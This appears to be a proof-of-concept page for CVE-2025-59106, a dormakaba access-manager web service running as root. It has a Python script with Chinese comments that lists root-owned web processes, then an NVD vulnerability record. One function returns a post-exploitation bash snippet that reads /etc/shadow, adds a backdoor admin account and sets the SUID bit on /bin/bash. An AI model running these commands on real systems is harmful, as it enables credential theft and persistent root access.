CVE-2025-59106

# CVE-2025-59106 PoC - 检查Web服务进程权限 # 该PoC演示了如何识别以root权限运行的Web服务进程 import subprocess import re def check_root_processes(): """检查所有以root用户运行的进程""" try: # 获取所有进程及其用户信息 result = subprocess.run(['ps', 'aux'], capture_output=True, text=True) processes = result.stdout.split('\n') root_processes = [] for proc in processes: if 'root' in proc: # 提取进程信息 parts = proc.split() if len(parts) >= 11: pid = parts[1] user = parts[0] command = ' '.join(parts[10:]) # 识别Web服务相关进程 web_indicators = ['http', 'web', 'apache', 'nginx', 'server', 'dormakaba'] if any(indicator in command.lower() for indicator in web_indicators): root_processes.append({ 'pid': pid, 'user': user, 'command': command }) return root_processes except Exception as e: return str(e) def exploit_scenario(): """ 攻击场景： 1. 攻击者发现系统存在其他漏洞（如RCE） 2. 攻击者利用该漏洞在系统上执行代码 3. 由于Web服务以root运行，攻击者自动获得root权限 """ return '''#!/bin/bash # 假设攻击者已通过其他漏洞获得代码执行能力 # 利用root权限的Web服务进程进行权限提升 # 示例：利用Web服务进程的root权限执行命令 id # 确认当前用户 # 输出应显示uid=0(root) 如果Web服务以root运行 # 进一步利用 cat /etc/shadow # 读取shadow文件（需要root权限） useradd -p $(openssl passwd -1 newpassword) newadmin # 创建后门账户 chmod +s /bin/bash # 设置SUID位进行持久化 ''' if __name__ == '__main__': print('CVE-2025-59106 权限检查工具') print('=' * 50) root_procs = check_root_processes() if root_procs: print('发现以root运行的Web服务进程：') for proc in root_procs: print(f"PID: {proc['pid']}, User: {proc['user']}") print(f"Command: {proc['command']}") else: print('未发现异常的root权限Web进程')

{"cve": {"id": "CVE-2025-59106", "sourceIdentifier": "551230f0-3615-47bd-b7cc-93e92e730bbf", "published": "2026-01-26T10:16:08.513", "lastModified": "2026-02-12T15:54:17.057", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabilities it is possible to directly execute commands with highest privileges."}, {"lang": "es", "value": "El binario que sirve al servidor web y que ejecuta prácticamente todas las acciones lanzadas desde la interfaz de usuario web se está ejecutando con privilegios de root. Esto va en contra del principio de mínimo privilegio. Si un atacante es capaz de ejecutar código en el sistema a través de otras vulnerabilidades, es posible ejecutar comandos directamente con los privilegios más altos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-272"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9200-k7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "bame_06.00", "matchCriteriaId": "677FDE80-CB98-4CAA-BAEA-B75CD903CE15"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9200-k7:-:*:*:*:*:*:*:*", "matchCriteriaId": "625A7698-8C85-443A-8234-3378335CF871"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9230-k7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "bame_06.00", "matchCriteriaId": "88F6324C-CCC1-4B42-8BE7-5D64EC43F27D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9230-k7:-:*:*:*:*:*:*:*", "matchCriteriaId": "706730A1-C200-40FA-A7F0-153DAC88128A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9290-k7_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "bame_06.00", "matchCriteriaId": "ECF1C26D-A592-46F3-996F-28E92C96F6BE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9290-k7:-:*:*:*:*:*:*:*", "matchCriteriaId": "56E30693-0FCA-4568-A2E8-C9D3C8D4E682"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9200-k5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "533DF243-A900-46D3-85EE-C898716A1AE6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9200-k5:-:*:*:*:*:*:*:*", "matchCriteriaId": "51D3E658-5FA5-4C38-85B1-05D914AC973F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9230-k5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A10552E6-7CC9-43DA-9020-DA344B92D50F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9230-k5:-:*:*:*:*:*:*:*", "matchCriteriaId": "926B0276-D7C3-4099-AD6D-C63B860A57F4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dormakabagroup:dormakaba_access_manager_9290-k5_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F36B37E-5048-4EB2-9B0B-3A1607ABD7D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dormakabagroup:dormakaba_access_manager_9290-k5:-:*:*:*:*:*:*:*", "matchCriteriaId": "7B8FCD3D-0E03-4ACA-884C-540866A4B7B9"}]}]}], "references": [{"url": "https://r.sec-consult.com/dkaccess", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "tags": ["Third Party Advisory"]}, {"url": "https://r.sec-consult.com/dormakaba", "source": "551230f0-3615-47bd-b7cc-93e92e730bbf", "tags": ["Third Party Advisory"]}, {"url": "https://www.dormaka ... (truncated)